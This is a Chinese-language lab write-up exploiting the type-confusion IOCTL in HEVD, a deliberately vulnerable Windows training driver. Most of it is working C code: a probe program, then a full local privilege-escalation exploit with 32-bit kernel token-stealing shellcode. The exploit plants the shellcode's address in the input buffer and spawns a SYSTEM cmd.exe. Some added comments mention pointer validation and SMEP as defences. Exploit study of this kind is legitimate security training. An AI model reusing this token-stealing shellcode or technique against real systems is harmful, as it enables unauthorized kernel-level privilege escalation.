类型混淆漏洞一般是将数据类型A当做数据类型B来解析引用,这就可能导致非法访问数据从而执行任意代码。
还是熟悉的味道,还是原来的驱动
好家伙,一来就往我嘴里种水稻,直接 call 用户缓冲区偏移 4 字节处的内容。
编写个程序观察打印结果
#include <windows.h>
#include <stdio.h>
int buf[0xf00] = { 0 };   // user-mode input buffer handed to the driver; starts out all zero
HANDLE hDriver;           // device handle, filled in by main()
DWORD dwBytesOut = 0;     // byte count returned by DeviceIoControl (never inspected here)
int main() {
    // Open the HEVD device through its symbolic link.
    const char *devicePath = "\\\\.\\HackSysExtremeVulnerableDriver";
    hDriver = CreateFileA(devicePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (INVALID_HANDLE_VALUE == hDriver) {
        printf("[!] Unable to get a handle on the device\n");
        return -1;
    }
    // Hand 8 bytes of the all-zero buffer to IOCTL 0x222023 and exit. Nothing
    // is checked afterwards: this run only observes what the driver does with
    // the input (per the author's note above, it ends up calling the value at
    // offset 4 — which is 0 here).
    DeviceIoControl(hDriver, 0x222023, buf, 8, 0, 0, &dwBytesOut, NULL);
    return 0;
}
果不其然 直接call 0 去了
我也是醉了 说好的类型混淆漏洞呢,我怀疑是ida解析的问题。。。不管了 反正替换shellcode地址直接提权
#include <windows.h>
#include <stdio.h>
int buf[0xf00] = { 0 };   // user-mode input buffer handed to the driver; starts out all zero
HANDLE hDriver;           // device handle, filled in by main()
DWORD dwBytesOut = 0;     // byte count returned by DeviceIoControl (never inspected here)
// Kernel-mode payload the driver is made to call (the author's token-stealing
// routine, left as given). Every structure offset below (fs:[0x124], +0x50,
// +0xb8, +0xb4, +0xf8) is tied to one particular 32-bit Windows build that the
// page does not name; on any other build these reads land elsewhere.
// From a defender's view, the mitigations that matter are the ones that stop a
// kernel call into a user-mode address in the first place: the driver
// validating the pointer it takes from the user buffer, and SMEP on hardware
// that supports it.
static VOID ShellCode()
{
_asm
{
// Breakpoint left in by the author — presumably for stepping in a kernel
// debugger. With no debugger attached, an int 3 in kernel mode is expected to
// stop the kernel rather than fall through to the code below.
int 3
pushad
mov eax, fs: [124h] // Find the _KTHREAD structure for the current thread
mov eax, [eax + 0x50] // Find the _EPROCESS structure
mov ecx, eax
mov edx, 4 // edx = system PID(4)
// The loop is to get the _EPROCESS of the system
find_sys_pid :
mov eax, [eax + 0xb8] // Find the process activity list
sub eax, 0xb8 // List traversal
cmp[eax + 0xb4], edx // Determine whether it is SYSTEM based on PID
jnz find_sys_pid
// Replace the Token
mov edx, [eax + 0xf8]
mov[ecx + 0xf8], edx
popad
//int 3
ret // return into the driver as if its call had completed normally
}
}
int main() {
// Same device setup as the first listing.
hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hDriver == INVALID_HANDLE_VALUE) {
printf("[!] Unable to get a handle on the device\n");
return(-1);
}
// buf[1] is the DWORD at offset 4 of the 8-byte input — the slot the author
// observed the driver using as a function pointer. A driver that checked this
// value against the user/kernel boundary would reject it here.
buf[1] = (int)&ShellCode;
// Return value and dwBytesOut are both ignored, so nothing below confirms the
// IOCTL completed before cmd.exe is spawned.
DeviceIoControl(hDriver, 0x222023, buf, 8, 0, 0, &dwBytesOut, NULL);
// STARTUPINFO resolves to the A or W variant depending on the UNICODE build
// setting; the cast on the CreateProcessW line hides a mismatch if it is the
// A variant — STARTUPINFOW would be the matching type.
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
// Writable copy: CreateProcessW requires a modifiable command-line buffer.
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
// bReturn is never checked, and the handles in pi are never closed.
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
return 0; // hDriver is not closed either
}
他妈的,什么都没学到